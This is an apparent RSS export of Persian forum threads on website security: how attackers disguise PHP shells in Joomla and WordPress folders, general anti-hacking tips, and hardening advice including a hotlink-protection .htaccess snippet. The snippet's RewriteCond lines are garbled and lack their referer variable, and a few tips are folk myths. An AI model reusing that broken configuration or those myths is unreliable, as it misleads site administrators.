هکرها با ترفندهای مختلف فایل های خود را در اینگونه الحاقات قرار میدهند و از نام های مشابه استفاده میکنند مثلا در اکثر اسکریپت ها فایلی به نام index.php هست و آنها ممکن است از نام هایی مانند indexs.php یا indexser.php یا هر نام دیگری استفاده کنند تا کاربر متوجه نام مشکوک فایل نشود.<br />
برخی هم فایل با نام مخصوص خودشون رو دارند که اینهارو راحت تر میشه پیدا کرد.<br />
وجود فایل های با پسوند php در پوشه تصاویر معنی ندارد و باید همیشه مراقب پوشه ایمجز جوملا باشید و بررسی کنید.حتما پوشه های دیگر موجود در پوشه ایمجز هم بررسی کنید مخصوصا پوشه stories و حتما قالب و افزونه های پیش فرض جوملا رو که نیاز ندارید حذف کنید بخصوص قالب های beez که هکرها مسیرهای اینهارو بیشتر استفاده میکنند.<br />
<br />
یا برخی شل هارو تغییر پسوند میدهند و از پسودندهایی مانند gif استفاده میکنند و بعدا سعی در تغییر پسوند و استفاده میکنند.<br />
بهرحال دوستان باید مراقب این موارد باشند ضمن اینکه موارد امنیتی رو رعایت میکنند سعی کنند از افزونه های وارز تا حد امکان استفاده نکنند.<br />
بیشتر مواردی رو که من در سرور مشاهده میکنم از این دسته فایل ها هستند.<br />
امروز دیدم یکی از دوستان وردپرس نصب کرده و در پوشه قالب ها فایلی به نام 404.php است که یک شل است که با این نام جایگزین فایل وردپرس شده احتمالا.قالب هم از قالب های وارز بود.<br />
جالب اینه که این بهترین روش برای هک کردن یک سایت است و فقط کافیست یک لینک رندم و غیر موجود در سایت فراخوانی بشه تا صفحه 404 رو که صفحه مخرب هست مشاهده کرد.<br />
بهرحال مهمترین وظیفه یک مدیر سایت تامین امنیت سایت و گرفتن بک آپ های منظم است.برای امنیت هم استفاده از الحاقات وارز کمی خطرناک است.<br />
مصیبت اصلی و مهم اینه که الان مد شده تقریبا تمامی فروشنده های قالب و افزونه افزونه های وارز رو دانلود و فارسی و میفروشند البته ممکنه برخی از دوستان نسخه های اوریجینال رو خریداری و ترجمه کنند و بفروشند ولی تا اونجا که من دیدم اکثرا از وارز استفاده میکنند.<br />
<br />
این موارد گوشه ای از موارد موجود هستند و دنیای هک خیلی گستره است و روش های مختلفی برای نفوذ به سایت استفاده میکنند.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ایمنی کامپیوتر،اینترنت و جلوگیری از هک شدن]]></title>
			<link>https://forums.parsjoom.ir/thread-12621.html</link>
			<pubDate>Sat, 17 Aug 2013 07:35:58 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-12621.html</guid>
			<description><![CDATA[در این مقاله قصد داریم تا دربارهء روش های افزایش امنیت کامپیوتر و اینترنت صحبت کنیم. امیدواریم با خواندن این مقاله اطلاعات و دانسته های خود را بالا ببرید تا از خطرات اینترنت و هک شدن در امان باشید.<br />
<br />
1.روش مهندسی اجتماعی نخستین حیله ای است که افراد به آن روی می آورند، کوین میتنیک هکر پیشین معروف جهان در این زمینه مهارت بسیار خوبی داشت و در این مورد کتابی نوشته است .روش مهندسی اجتماعی یکی از روشهای دشوار و راحت است که اگر شما کمی معلوماتتان را افزایش دهید این روش برای خود هکر هم سخت خواهد شد.<br />
<br />
2.در انتخاب رمز و پسوردها دقت کنید زیرا بعضی افراد شماره شناسنامه،شماره تلفن،تارخ تولد،شماره کارت ملی و غیره را برای رمز خود قرار می دهند،زیرا به گفته خودشان پسوردها را خیلی سریع از یاد می برند. همیشه از کلیدهای Alt،shift ، Space و ... با طول زیاد انتخاب کنید ابن روش هک شدن شما را کم می کند.<br />
<br />
3.دزدیدن رمز از روی حرکت دستهای شما یکی از راه هایی است که افراد هنوز از آن استفاده می کنند. هنگامی که رمزتان را وارد می کنید مراقب باشید کسی نبیند و یا از اطرافیانتان بخواهید کمی آن طرف تر بایستند.<br />
<br />
4.تا جایی که ممکن است پسوردهایتان را ذخیره نکنید از جمله پسوردهای گوگل،یاهو و...<br />
<br />
5.اشخاص حرفه ای رو به سرقت Cookie آورده اند این کلوچه ها داده های خیلی مهمی را به صورت کد نگه می دارند که با کمی زحمت و تلاش میتوان آن را از حالت کد شده بیرون آورد تا مطالب سودمندی بدست آورد.<br />
<br />
6.هر وقت به Email و یا Gmail وارد می شوید تیک کنار گزینه My ID... Remember را بردارید و هنگام خارج شدن حتما Logout کنید تا از سرور سایت خارج شوید .همچنین بعد از Logout کردن یک رمز عبور الکی وارد کنید زیرا از ریجستری می شود ای دی و رمز شخص قبل را آشکار کرد.<br />
<br />
7.وقتی که می خواهید وارد Mail Box خود شوید بعد از وارد کردن یوزرنیم و پسورد روی لینک Secure  در پایین Sign in کلیک کنید با اینکار اطلاعات شما به صورت رمز شده به سرور سایت فرستاده می شود واگر کسی از Sniffing در منتقل کردن داده ها استفاده کند نمی تواند اطلاعات شما را بدزدد.<br />
<br />
8.یکی از راه های معمول هک بین کاربران تروجان ها است هیچ وقت از شخصی در اتاق های چت عکس یا فایل دریافت نکنید اگر کسی می خواهد عکسش را برایتان ارسال کند به او بگویید که عکسش را در پروفایلش قراردهد.<br />
<br />
9.همیشه از وب سایت های قابل اطمینان، برنامه هایتان را دانلود کنید و اگرهم امکان نداشت از سایت مورد نظرتان مطمئن شوید و بعد از اتمام دانلود فایل ها را ویروس یابی و ویروس کشی کنید .<br />
<br />
10.مراقب ویروس وکردجان باشید چرا که بعضی وب سایت ها به این ویروس آلوده هستند و بدون اینکه کاربرمتوجه شود وارد کامپیوتر وی می شود.<br />
<br />
11.اگر به اطلاعات History احتیاجی ندارید هر چند وقت یکبار آن را پاک کنید خصوصا هنگامی که در کافی نت و یا خانهء دوستتان هستید.<br />
<br />
12.کیلاگر برنامه های جاسوسی هستند که می توانند داده های شما را ثبت و ذخیره کنند و اکثر آنها این توانایی را دارند که اطلاعات ثبت شده را هر چند روز یکبار به ایمیل شخص ارسال کنند .از نصب کیلا گرها نمی توان به طور 100درصد مطلع شد پس مراقب خود باشید . مثلا اگر دوست شما روی سیستم خودش کیلاگر نصب کند و شما هم امنیت را رعایت نکنید شخص میتواند براحتی اطلاعات شما را بدزدد ضمنا ویروس یاب ها کاری به کیلاگرها ندارند .<br />
<br />
13.سعی کنید برای مطالب با اهمیت خود از کامپیوترهای عمومی استفاده نکنید. بعضی از افراد به این نکته توجهی نمی کنند و وقتی در جایی اینترنت مجانی پیدا می کنند بدون هیچ تامل و تردیدی شروع به وارد کردن اطلاعات خود می کنند.<br />
<br />
14.در گزینش کافی نت ها دقت زیادی داشته باشید ممکن است با یک اشتباه اطلاعاتتان به سرقت رود.<br />
<br />
15.از یک ویروس یاب  به روز شده استفاده کنید اگر ویروس یاب شما به روز نباشد احتمال دارد لطمه غیر قابل جبرانی بخورید.]]></description>
			<content:encoded><![CDATA[در این مقاله قصد داریم تا دربارهء روش های افزایش امنیت کامپیوتر و اینترنت صحبت کنیم. امیدواریم با خواندن این مقاله اطلاعات و دانسته های خود را بالا ببرید تا از خطرات اینترنت و هک شدن در امان باشید.<br />
<br />
1.روش مهندسی اجتماعی نخستین حیله ای است که افراد به آن روی می آورند، کوین میتنیک هکر پیشین معروف جهان در این زمینه مهارت بسیار خوبی داشت و در این مورد کتابی نوشته است .روش مهندسی اجتماعی یکی از روشهای دشوار و راحت است که اگر شما کمی معلوماتتان را افزایش دهید این روش برای خود هکر هم سخت خواهد شد.<br />
<br />
2.در انتخاب رمز و پسوردها دقت کنید زیرا بعضی افراد شماره شناسنامه،شماره تلفن،تارخ تولد،شماره کارت ملی و غیره را برای رمز خود قرار می دهند،زیرا به گفته خودشان پسوردها را خیلی سریع از یاد می برند. همیشه از کلیدهای Alt،shift ، Space و ... با طول زیاد انتخاب کنید ابن روش هک شدن شما را کم می کند.<br />
<br />
3.دزدیدن رمز از روی حرکت دستهای شما یکی از راه هایی است که افراد هنوز از آن استفاده می کنند. هنگامی که رمزتان را وارد می کنید مراقب باشید کسی نبیند و یا از اطرافیانتان بخواهید کمی آن طرف تر بایستند.<br />
<br />
4.تا جایی که ممکن است پسوردهایتان را ذخیره نکنید از جمله پسوردهای گوگل،یاهو و...<br />
<br />
5.اشخاص حرفه ای رو به سرقت Cookie آورده اند این کلوچه ها داده های خیلی مهمی را به صورت کد نگه می دارند که با کمی زحمت و تلاش میتوان آن را از حالت کد شده بیرون آورد تا مطالب سودمندی بدست آورد.<br />
<br />
6.هر وقت به Email و یا Gmail وارد می شوید تیک کنار گزینه My ID... Remember را بردارید و هنگام خارج شدن حتما Logout کنید تا از سرور سایت خارج شوید .همچنین بعد از Logout کردن یک رمز عبور الکی وارد کنید زیرا از ریجستری می شود ای دی و رمز شخص قبل را آشکار کرد.<br />
<br />
7.وقتی که می خواهید وارد Mail Box خود شوید بعد از وارد کردن یوزرنیم و پسورد روی لینک Secure  در پایین Sign in کلیک کنید با اینکار اطلاعات شما به صورت رمز شده به سرور سایت فرستاده می شود واگر کسی از Sniffing در منتقل کردن داده ها استفاده کند نمی تواند اطلاعات شما را بدزدد.<br />
<br />
8.یکی از راه های معمول هک بین کاربران تروجان ها است هیچ وقت از شخصی در اتاق های چت عکس یا فایل دریافت نکنید اگر کسی می خواهد عکسش را برایتان ارسال کند به او بگویید که عکسش را در پروفایلش قراردهد.<br />
<br />
9.همیشه از وب سایت های قابل اطمینان، برنامه هایتان را دانلود کنید و اگرهم امکان نداشت از سایت مورد نظرتان مطمئن شوید و بعد از اتمام دانلود فایل ها را ویروس یابی و ویروس کشی کنید .<br />
<br />
10.مراقب ویروس وکردجان باشید چرا که بعضی وب سایت ها به این ویروس آلوده هستند و بدون اینکه کاربرمتوجه شود وارد کامپیوتر وی می شود.<br />
<br />
11.اگر به اطلاعات History احتیاجی ندارید هر چند وقت یکبار آن را پاک کنید خصوصا هنگامی که در کافی نت و یا خانهء دوستتان هستید.<br />
<br />
12.کیلاگر برنامه های جاسوسی هستند که می توانند داده های شما را ثبت و ذخیره کنند و اکثر آنها این توانایی را دارند که اطلاعات ثبت شده را هر چند روز یکبار به ایمیل شخص ارسال کنند .از نصب کیلا گرها نمی توان به طور 100درصد مطلع شد پس مراقب خود باشید . مثلا اگر دوست شما روی سیستم خودش کیلاگر نصب کند و شما هم امنیت را رعایت نکنید شخص میتواند براحتی اطلاعات شما را بدزدد ضمنا ویروس یاب ها کاری به کیلاگرها ندارند .<br />
<br />
13.سعی کنید برای مطالب با اهمیت خود از کامپیوترهای عمومی استفاده نکنید. بعضی از افراد به این نکته توجهی نمی کنند و وقتی در جایی اینترنت مجانی پیدا می کنند بدون هیچ تامل و تردیدی شروع به وارد کردن اطلاعات خود می کنند.<br />
<br />
14.در گزینش کافی نت ها دقت زیادی داشته باشید ممکن است با یک اشتباه اطلاعاتتان به سرقت رود.<br />
<br />
15.از یک ویروس یاب  به روز شده استفاده کنید اگر ویروس یاب شما به روز نباشد احتمال دارد لطمه غیر قابل جبرانی بخورید.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[سایت بین المللی  projecthoneypot سازمانی ضد اسپم ]]></title>
			<link>https://forums.parsjoom.ir/thread-11565.html</link>
			<pubDate>Fri, 17 May 2013 07:16:54 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-11565.html</guid>
			<description><![CDATA[دوستان امروز  معرفی یه سایت رو داریم<br />
<br />
چون سایت جالبی هست معرفی میکنم<br />
<div style="text-align: center;">
<img src="http://forums.parsjoom.ir/imgup/3667/1368773882_3667_eab35d70dd.PNG" border="0" alt="[تصویر:  1368773882_3667_eab35d70dd.PNG]" /><br />
<br />
<img src="http://forums.parsjoom.ir/imgup/3667/1368775108_3667_e77fdbd588.jpg" border="0" alt="[تصویر:  1368775108_3667_e77fdbd588.jpg]" /><br />
</div>
سایت جهانی پروژه ضد اسپم <img src="images/smils1/devil.gif" style="vertical-align: middle;" border="0" alt="Devil" title="Devil" /> برای ایجاد فضایی امن در سطح وب<br />
<br />
شما میتونید با معرفی سایتتون به این مرکز در مقابل اسپمر ها به خوبی واکسینه بشید<br />
این پروژه زبان های تحت php, asp.net, perl, python ,وسایر زبان ها رو پشتیبانی میکنه<br />
<br />
این مرکز به صورت اتوماتیک آی پی های سراسر جهان رو بررسی میکنه و اسپمر ها رو اگر بر روی سایت شما شناسایی کنه ابتدا 8 روز آی پی مورد نظر رو قرنتینه میکنه وامکان فعالیت بهش نمیده بعد از اون آی پی به مرکز گزارش میشه و برای گندزدایی و پاکسازی اقدام میشه<br />
<br />
بسیار سیستم قدرتمندی داره خودم امتحان کردم <br />
البته اگر نویسندگان زیادی دارید مواظب باشید نویسندگان ومدیران سایت کارهایی که به عنوان اسپم شناخته میشه انجام ندند در غیر اینصورت حتی مدیران سایت هم در لیست malware این پروژه میتونن قرار داده بشن در اونصورت مدیر مورد نظر در بخش مدیریت هشداری از سوی سازمان دریافت میکنه و درانجام فعالیتهای عادیش به مشکل بر میخوره<br />
<br />
در بخش IP to lookup شما میتونید آی پی مورد نظرتون رو برای بررسی  وارد کنید ونتایج و سوابق رو به صورت تفصیلی در مورد آی پی مشاهده کنید<br />
<br />
در بخش استاتیستیک آماری به تفکیک کشورها قابل مشاهده هست<br />
<br />
در قسمت داشبورد شما لیستی از آی پی های شناسایی شده به تفکیک کشور خودتون از جمله ایران و آی پی های نزدیک به آی پی شما و کشور های دیگه و مانیتورینگ پروفایلتون رو مشاهده کنید<br />
<br />
در بخش ip data شما میتونید لیستی از بدترین 50 آی پی اخیر رو ببینید<br />
<br />
در این مرکز حتی امکان نظر دهی در مورد آی پی ها وجود داره<br />
<br />
در بخش خدمات یا سرویس شما میتونید یک آی پی رو برای مانتیتورینگ انتخاب کنید همچنین امکان ایجاد بلک لیست هم وجود داره <br />
<br />
البته بعضی از خدمات این پروژه نیاز به آپگرید حساب کاربری و پرداخت هزینه هست ولی خدمات اصلی رایگان ارائه میشه]]></description>
			<content:encoded><![CDATA[دوستان امروز  معرفی یه سایت رو داریم<br />
<br />
چون سایت جالبی هست معرفی میکنم<br />
<div style="text-align: center;">
<img src="http://forums.parsjoom.ir/imgup/3667/1368773882_3667_eab35d70dd.PNG" border="0" alt="[تصویر:  1368773882_3667_eab35d70dd.PNG]" /><br />
<br />
<img src="http://forums.parsjoom.ir/imgup/3667/1368775108_3667_e77fdbd588.jpg" border="0" alt="[تصویر:  1368775108_3667_e77fdbd588.jpg]" /><br />
</div>
سایت جهانی پروژه ضد اسپم <img src="images/smils1/devil.gif" style="vertical-align: middle;" border="0" alt="Devil" title="Devil" /> برای ایجاد فضایی امن در سطح وب<br />
<br />
شما میتونید با معرفی سایتتون به این مرکز در مقابل اسپمر ها به خوبی واکسینه بشید<br />
این پروژه زبان های تحت php, asp.net, perl, python ,وسایر زبان ها رو پشتیبانی میکنه<br />
<br />
این مرکز به صورت اتوماتیک آی پی های سراسر جهان رو بررسی میکنه و اسپمر ها رو اگر بر روی سایت شما شناسایی کنه ابتدا 8 روز آی پی مورد نظر رو قرنتینه میکنه وامکان فعالیت بهش نمیده بعد از اون آی پی به مرکز گزارش میشه و برای گندزدایی و پاکسازی اقدام میشه<br />
<br />
بسیار سیستم قدرتمندی داره خودم امتحان کردم <br />
البته اگر نویسندگان زیادی دارید مواظب باشید نویسندگان ومدیران سایت کارهایی که به عنوان اسپم شناخته میشه انجام ندند در غیر اینصورت حتی مدیران سایت هم در لیست malware این پروژه میتونن قرار داده بشن در اونصورت مدیر مورد نظر در بخش مدیریت هشداری از سوی سازمان دریافت میکنه و درانجام فعالیتهای عادیش به مشکل بر میخوره<br />
<br />
در بخش IP to lookup شما میتونید آی پی مورد نظرتون رو برای بررسی  وارد کنید ونتایج و سوابق رو به صورت تفصیلی در مورد آی پی مشاهده کنید<br />
<br />
در بخش استاتیستیک آماری به تفکیک کشورها قابل مشاهده هست<br />
<br />
در قسمت داشبورد شما لیستی از آی پی های شناسایی شده به تفکیک کشور خودتون از جمله ایران و آی پی های نزدیک به آی پی شما و کشور های دیگه و مانیتورینگ پروفایلتون رو مشاهده کنید<br />
<br />
در بخش ip data شما میتونید لیستی از بدترین 50 آی پی اخیر رو ببینید<br />
<br />
در این مرکز حتی امکان نظر دهی در مورد آی پی ها وجود داره<br />
<br />
در بخش خدمات یا سرویس شما میتونید یک آی پی رو برای مانتیتورینگ انتخاب کنید همچنین امکان ایجاد بلک لیست هم وجود داره <br />
<br />
البته بعضی از خدمات این پروژه نیاز به آپگرید حساب کاربری و پرداخت هزینه هست ولی خدمات اصلی رایگان ارائه میشه]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[سه روش ساده ولی موثر در جلوگیری از هک شدن سایت در جوملا وردپرس و ...]]></title>
			<link>https://forums.parsjoom.ir/thread-11470.html</link>
			<pubDate>Wed, 08 May 2013 17:43:07 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-11470.html</guid>
			<description><![CDATA[<img src="http://blog.hostgator.com/~/tmp/wp-uploads/2013/03/website-security.jpg" border="0" alt="[تصویر:  website-security.jpg]" /><br />
<br />
<br />
<br />
مقاله ای که مشاهده میکنید یکی از مقاله های سایت معتبر hostgator (یکی از سایتهای بزرگ در عرصه وب و شرکت های بین المللی) هست که بنده با کمی تغییر به فارسی برگردوندمدیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
نویسنده خیلی ساده در مورد امنیت در سایت راهکارهایی داده که با هم مطالعه میکنیم<br />
 <br />
در بیشتر مواقع راه حل های ساده ای وجود دارد که انقدر ساده ودر دسترس به نظر می رسد که در نظر مدیران سایتها از اهمیت کم تری برخوردار میشود و به راحتی از کنار آن میگذرند<br />
<br />
راهکارهای ساده که با عمل به آنها در هزینه ها و امکانات بعضا بسیار بزرگی صرفه جویی میشود وجلوی خسارت های جبران ناپذیر را برای بعضی وب سایت ها به راحتی میگیرد <br />
<br />
یکی از دقدقه های مدیران وب سایت ها حفاظت از منابع و اطلاعات سایت و جلو گیری از تخریب و آسیب رسانی به محتوا و امکانات پایگاه های اینترنتی توسط هکر هاست<br />
در اینجا با 3 روش آسان ولی کاربردی ومفید برای جلوگیری از هک شدن سایت شما توسط هکر ها آشنا می شویم<br />
<br />
1_ بروزرسانی مداوم پلتفرم واسکریپت های مدیریتی وب سایت ها<br />
یکی از بهترین فکر ها برای حفاظت وب سایت شما در برابر هکر ها بروز رسانی هسته مدیریتی وب سایت شماست <br />
امروزه بیشتر پلتفرم های مدیریت محتوا مثل ورد پرس ، جوملا، دروپال و... به صورت متن باز برای توسعه بیشتر در اختیار برنامه نویسان قرار میگیرندو از آنجاییکه این سیستم ها از محبوبیت بالایی برخوردارند وسایت های بیشماری با سیستم های متن باز اداره میشوند هکرها هم درصدد نفوذ وتخریب اینگونه سیستم ها هستند و متن باز بودن این سیستم ها برخی اوقات باعث سوء استفاده ونفوذ هکر ها با دسترسی به کدهای سیستم مدیریت محتوا می شود<br />
از طرفی شرکت های ارائه کننده سیستم های مدیریت وب سایت ها با گذر زمان حفره های امنیتی و نواقص سیستم ها و اسکریپت های خود را شناسایی و در نسخه های جدید این مشکلات را بررسی و برطرف می نمایند<br />
پس عاقلانه به نظر میرسد که سیستم های مدیریتی وب سایت هایتان را برای برطرف شدن نواقص و جلوگیری از حملات احتمالی به روز نگه دارید<br />
<br />
2-استفاده از پلاگین ها وافزونه های امنیتی برای مقابله با هک شدن سایت<br />
یکی دیگر از روش های مناسب برای جلوگیری از نفوذ هکر ها استفاده از افزونه های امنیتی مناسب برای حفاظت بیشتر در مقابل حملات احتمالیست<br />
اگر از سیستم های متن باز که در بالا به آن اشاره شد استفاده میکنید معمولا توسط شرکت های سازنده وتوسعه دهنده افزونه های خاصی هم برای حل مشکلا امنیتی معرفی میشود که به راحتی میتوانید با دانلود ونصب آن از سیستم سایت خود حفاظت کنید به عنوان مثال در ورد پرس افزونه هایی مثل:<br />
 Better WP Security , Bulletproof Security <br />
می توانند مورد استفاده قرار گیرند<br />
 در جوملا نیز افزونه های مناسبی برای حفاظت از وب سایت شما وجود دارند مثل:<br />
,jhackguard,sqlinjection,RSFirewall!<br />
,OSE Anti-Virus™ for Joomla!,OSE Secure™ plugin<br />
ose anti hacker,admin tools,security check,incpsola <br />
در دروپال و بقیه سیستم ها نیز افزونه های برای حفاظت از سایت شما وجود دارد پس برای بالا بردن سطح امنیت وب سایت خود از افزونه های امنیتی استفاده کنید<br />
<br />
3-تنظیم صحیح سطوح دسترسی به پوشه های وب سایت<br />
سطوح دسترسی نیز یکی دیگر از فاکتورهایی ایت که مدیران وب سایت ها برای امنیت بیشتر وکارایی بالا در وبسایت خود باید آنرا رعایت کنند<br />
سطوح دسترسی پوشه های وب سایت باید بر روی 755 و فایل ها بر روی 644 تنظیم شده باشد برای اینکار از طریق کنترل پنل سایت که توسط هاست در اختیار شما قرار گرفته وارد فایل منیجر شده و با انتخاب پوشه یا فایل مورد نظر سطح دسترسی را بر روی مقدار ذکر شده قرار دهید<br />
با رعایت موارد ذکر شده در این مطلب شما راههای نفوذ بسیاری از هکر ها را خواهید بست <br />
<br />
دوستان همیشه بهترین راه پیچیده ترین راه نیست]]></description>
			<content:encoded><![CDATA[<img src="http://blog.hostgator.com/~/tmp/wp-uploads/2013/03/website-security.jpg" border="0" alt="[تصویر:  website-security.jpg]" /><br />
<br />
<br />
<br />
مقاله ای که مشاهده میکنید یکی از مقاله های سایت معتبر hostgator (یکی از سایتهای بزرگ در عرصه وب و شرکت های بین المللی) هست که بنده با کمی تغییر به فارسی برگردوندمدیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
نویسنده خیلی ساده در مورد امنیت در سایت راهکارهایی داده که با هم مطالعه میکنیم<br />
 <br />
در بیشتر مواقع راه حل های ساده ای وجود دارد که انقدر ساده ودر دسترس به نظر می رسد که در نظر مدیران سایتها از اهمیت کم تری برخوردار میشود و به راحتی از کنار آن میگذرند<br />
<br />
راهکارهای ساده که با عمل به آنها در هزینه ها و امکانات بعضا بسیار بزرگی صرفه جویی میشود وجلوی خسارت های جبران ناپذیر را برای بعضی وب سایت ها به راحتی میگیرد <br />
<br />
یکی از دقدقه های مدیران وب سایت ها حفاظت از منابع و اطلاعات سایت و جلو گیری از تخریب و آسیب رسانی به محتوا و امکانات پایگاه های اینترنتی توسط هکر هاست<br />
در اینجا با 3 روش آسان ولی کاربردی ومفید برای جلوگیری از هک شدن سایت شما توسط هکر ها آشنا می شویم<br />
<br />
1_ بروزرسانی مداوم پلتفرم واسکریپت های مدیریتی وب سایت ها<br />
یکی از بهترین فکر ها برای حفاظت وب سایت شما در برابر هکر ها بروز رسانی هسته مدیریتی وب سایت شماست <br />
امروزه بیشتر پلتفرم های مدیریت محتوا مثل ورد پرس ، جوملا، دروپال و... به صورت متن باز برای توسعه بیشتر در اختیار برنامه نویسان قرار میگیرندو از آنجاییکه این سیستم ها از محبوبیت بالایی برخوردارند وسایت های بیشماری با سیستم های متن باز اداره میشوند هکرها هم درصدد نفوذ وتخریب اینگونه سیستم ها هستند و متن باز بودن این سیستم ها برخی اوقات باعث سوء استفاده ونفوذ هکر ها با دسترسی به کدهای سیستم مدیریت محتوا می شود<br />
از طرفی شرکت های ارائه کننده سیستم های مدیریت وب سایت ها با گذر زمان حفره های امنیتی و نواقص سیستم ها و اسکریپت های خود را شناسایی و در نسخه های جدید این مشکلات را بررسی و برطرف می نمایند<br />
پس عاقلانه به نظر میرسد که سیستم های مدیریتی وب سایت هایتان را برای برطرف شدن نواقص و جلوگیری از حملات احتمالی به روز نگه دارید<br />
<br />
2-استفاده از پلاگین ها وافزونه های امنیتی برای مقابله با هک شدن سایت<br />
یکی دیگر از روش های مناسب برای جلوگیری از نفوذ هکر ها استفاده از افزونه های امنیتی مناسب برای حفاظت بیشتر در مقابل حملات احتمالیست<br />
اگر از سیستم های متن باز که در بالا به آن اشاره شد استفاده میکنید معمولا توسط شرکت های سازنده وتوسعه دهنده افزونه های خاصی هم برای حل مشکلا امنیتی معرفی میشود که به راحتی میتوانید با دانلود ونصب آن از سیستم سایت خود حفاظت کنید به عنوان مثال در ورد پرس افزونه هایی مثل:<br />
 Better WP Security , Bulletproof Security <br />
می توانند مورد استفاده قرار گیرند<br />
 در جوملا نیز افزونه های مناسبی برای حفاظت از وب سایت شما وجود دارند مثل:<br />
,jhackguard,sqlinjection,RSFirewall!<br />
,OSE Anti-Virus™ for Joomla!,OSE Secure™ plugin<br />
ose anti hacker,admin tools,security check,incpsola <br />
در دروپال و بقیه سیستم ها نیز افزونه های برای حفاظت از سایت شما وجود دارد پس برای بالا بردن سطح امنیت وب سایت خود از افزونه های امنیتی استفاده کنید<br />
<br />
3-تنظیم صحیح سطوح دسترسی به پوشه های وب سایت<br />
سطوح دسترسی نیز یکی دیگر از فاکتورهایی ایت که مدیران وب سایت ها برای امنیت بیشتر وکارایی بالا در وبسایت خود باید آنرا رعایت کنند<br />
سطوح دسترسی پوشه های وب سایت باید بر روی 755 و فایل ها بر روی 644 تنظیم شده باشد برای اینکار از طریق کنترل پنل سایت که توسط هاست در اختیار شما قرار گرفته وارد فایل منیجر شده و با انتخاب پوشه یا فایل مورد نظر سطح دسترسی را بر روی مقدار ذکر شده قرار دهید<br />
با رعایت موارد ذکر شده در این مطلب شما راههای نفوذ بسیاری از هکر ها را خواهید بست <br />
<br />
دوستان همیشه بهترین راه پیچیده ترین راه نیست]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[جلوگیری از دزدیدن فایل ها از هاست شما Hotlink Protection]]></title>
			<link>https://forums.parsjoom.ir/thread-11120.html</link>
			<pubDate>Wed, 10 Apr 2013 20:54:46 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-11120.html</guid>
			<description><![CDATA[اگر شما نخواهید فایل ها و یا عکس های که بر روی هاست شماست دیگران در سایت ها و وبلاگ های خود قرار دهند به راحتی می توانید با استفاده از کد زیر در htaccess. موجود در public_html هاست خود مانع چنین عملی شوید.<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>RewriteEngine on<br />
RewriteCond % !^&#36;<br />
RewriteCond % !^http://(www.)?domain.com.*&#36; [NC]<br />
RewriteRule .(gif|jpg)&#36; - [F]</code></div></div>
به جای domain.com در کد بالا اسم سایت خود را قرار دهید. فرمت فایل ها هم قابل تغییر است در کد بالا دو فرمت jpg و gif فیلتر شده اند. این عمل مزیت های مختلفی از جمله کاهش استفاده پهنای باند و استفاده کمتر از سخت افزار سرور سایت شما می شود.]]></description>
			<content:encoded><![CDATA[اگر شما نخواهید فایل ها و یا عکس های که بر روی هاست شماست دیگران در سایت ها و وبلاگ های خود قرار دهند به راحتی می توانید با استفاده از کد زیر در htaccess. موجود در public_html هاست خود مانع چنین عملی شوید.<br />
<div class="codeblock">
<div class="title">کد: <br />
</div><div class="body" dir="ltr"><code>RewriteEngine on<br />
RewriteCond % !^&#36;<br />
RewriteCond % !^http://(www.)?domain.com.*&#36; [NC]<br />
RewriteRule .(gif|jpg)&#36; - [F]</code></div></div>
به جای domain.com در کد بالا اسم سایت خود را قرار دهید. فرمت فایل ها هم قابل تغییر است در کد بالا دو فرمت jpg و gif فیلتر شده اند. این عمل مزیت های مختلفی از جمله کاهش استفاده پهنای باند و استفاده کمتر از سخت افزار سرور سایت شما می شود.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[بررسی کامل فایل های سایت های جوملایی بعد از هک شدن سایت توسط myjoomla.com]]></title>
			<link>https://forums.parsjoom.ir/thread-10344.html</link>
			<pubDate>Fri, 15 Feb 2013 20:53:37 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-10344.html</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://forums.parsjoom.ir/imgup/1/1360961420_1_90f32a9fda.jpg" border="0" alt="[تصویر:  1360961420_1_90f32a9fda.jpg]" /></div>
<br />
درود<br />
امشب سایتی رو به شما معرفی میکنم که میتوانید توسط اون تمامی فایل های سایت جوملایی خود را بررسی کنید حالا چه بعد از هک شدن سایت و چه قبل از ان.<br />
ممکن شما یک بسته ای رو از جایی دانلود کنید که احتمال داره در یکی از فایل های اون بکدور گذاشته باشند و یا هکری که سایت شما رو هک کرده یک بکدور برای دسترسی های بعدی قرار داده باشه.<br />
هرچند بهترین کار گرفتن و ذخیره کردن بک آپ می باشد ولی خوب چون ما ایرانی ها اکثرمون اصولا در این نکته کاهلی میکنیم همیشه با مشکلات اینگونه مواجه هستیم.<br />
خارج از مبحث هک شدن یا نشدن سایت یا دانلود بسته های مشکوک و آلوده میتوانید از این روش برای متوجه شدن تغییراتی که درجوملا داده شده نیز استفاده کنید مثلا بررسی تفاوت جوملای فارسی شده با جوملای انگلیسی.<br />
توجه داشته باشید قالب ها رو نمیتونید با این ابزار مقایسه کنید و فقط فایل های اصلی و پایه جوملا رو که در بسته نصبی جوملای اصلی دانلود شده از جوملای جهانی میتونید تطبیق دهید !<br />
<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
